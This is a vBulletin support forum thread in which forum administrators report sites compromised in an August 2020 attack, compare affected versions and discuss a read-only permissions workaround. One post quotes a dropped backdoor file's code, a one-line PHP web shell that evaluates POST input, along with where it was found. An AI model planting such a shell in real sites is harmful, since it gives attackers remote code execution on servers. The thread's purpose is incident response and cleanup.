• Filter
  • Time
  • Show
Clear All

• Known Exploit Warning Question

This morning I received the scan results on my server with a:

'/home/*******/public_html/forums/web.php'
    Known exploit = [Fingerprint Match] [PHP Shell Exploit [P1747]]

Indicating I have some type of issue. It was recommended that I replace the web.php file. That is fine but I don't know what this file does or where another copy of it would be.

I am running 5.6.2 PHP 7.1.33 MySql Version 5.7.31log

I know I have an update on my desk that needs to be done and was going to work on that today. Will that take care of this issue or do I have a bigger fish to fry somewhere? Thanks in advance for the assistance.

It looks like there are two instances in 5.6.1 PL1

/core/vb/request

/core/vb/session

Comment

Our team is looking into this issue. There is no "web.php" file included with vBulletin. You can see all suspect files by going into the AdminCP and visiting Maintenance -> Diagnostics. Making your vBulletin directory read only will prevent people from trying to write to the directory while we investigate.
      Translations provided by Google.

Wayne Luke
      The Rabid Badger - a vBulletin Cloud demonstration site.
      vBulletin 5 API - Full / Mobile
      Vote for your favorite feature requests and the bugs you want to see fixed.

Comment

Well at least in 5.5.5 there are 2 web.php in vb:

/upload/core/vb/request
        /upload/core/vb/session

as mentioned already.

They do not exist in 5.6.3 alpha4
        Paul M. 14.12.2012: You already know vB4 isnt being worked on atm, so of course no bugs are going to have been fixed in the last few months, nor are they going to get fixed "now".

Comment

My site was also compromised this morning at 6:35 AM GMT-7. The file is named 1.php and was placed in the root of the site. Windows Defender identified the exploit as Backdoor:PHP/Shell.Q
          https://www.microsoft.com/en-us/wdsi...tid=2147682386

I've zipped up the file and attached here as Backdoor.zip.
          Last edited by Wayne Luke; Mon 10 Aug '20, 10:32am.
          VB 5.6.3
          PHP 7.4
          MySQL 5.7.24

Comment

I've removed the attachment. It really is meaningless to post it. The developers are working on a solution.

Wayne Luke

Comment

• OrganForum
              OrganForum commented
              Editing a comment
              OK, thought it would be useful for solving the issue.

Originally posted by Niktator View Post
            Well at least in 5.5.5 there are 2 web.php in vb:
            I stand corrected. However, 5.5.5 is outside the supported range of vBulletin releases. We currently support the latest release and two versions back. vBulletin 5.5.5 will not receive any updates we release after investigation.

Wayne Luke

Comment

Originally posted by Wayne Luke View Post

I stand corrected. However, 5.5.5 is outside the supported range of vBulletin releases. We currently support the latest release and two versions back. vBulletin 5.5.5 will not receive any updates we release after investigation.
              I know. But this explains why some users got the web.php in their install. Telling there is no web.php is a bit more confusing then saying "we had a web-php in older versions"....

Waiting for "the solution" and even more for a list of affected versions.
              Paul M. 14.12.2012: You already know vB4 isnt being worked on atm, so of course no bugs are going to have been fixed in the last few months, nor are they going to get fixed "now".

Comment

I got hacked at noon (CST) today -- was on 5-6-1 Patch Level 1.

Have upgraded to 5-6-2. Can provide http access and error logs to Wayne Luke if you guys need help determining the attack vector.

Comment

We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).

Wayne Luke

Comment

• holymannn
                    holymannn commented
                    Editing a comment
                    All directory to 444? From /forum and it’s sub folders?

We know the vector and a patch is being developed. Hopefully, I can say more soon. The only workaround I can say at this time is to make your vBulletin directory read only (chmod 444).
                  Perfect. Done.

Comment

I found the files hax.php at these locations:

includes/vb5/template/cache/hax.php
                    includes/vb5/template/bbcode/hax.php

code is:
                    Code:
                    <?php eval($_POST[1]);?>

Comment

They could be anywhere in the system. Make your file system read only so the webserver cannot write to it.

Use the suspect files diagnostic to delete files and directories not part of vBulletin and that you did not place on the server yourself.

Wayne Luke

Comment

My 5.6.1 site was hit and I cannot access either url. I have 444'd it.

My 5.6.2 sites appear unaffected.
                        Last edited by NumNum; Mon 10 Aug '20, 12:35pm.
                        adktramping ~ my happy place.

"Whoever said practice makes perfect was an idiot. Humans can't be perfect because we're not machines." ~ Sam Gardner.

Comment

• OrganForum
                          OrganForum commented
                          Editing a comment
                          I was running 5.6.2 when exploited. This forum, forum.vbulletin.com, was down for maintenance this morning. I assume it was also exploited and all version 5.x.x are vulnerable.

• NumNum
                          NumNum commented
                          Editing a comment
                          Thank you for verifying.

I spoke too soon. Chmod 444 on the vbulletin root directory causes an issue with .htaccess not being readable (weird considering it IS readable with 444). I can work through that, but for me it wasn't as simple as setting 444.

Comment

• OrganForum
                          OrganForum commented
                          Editing a comment
                          I think htaccess needs to be executable as well as readable. Encountered same problem with 444

chmod 555 works
                          I've close my forum until a patch is ready.

• NumNum
                          NumNum commented
                          Editing a comment
                          What issue did you have? my site wont read my htaccess and its permissions are 644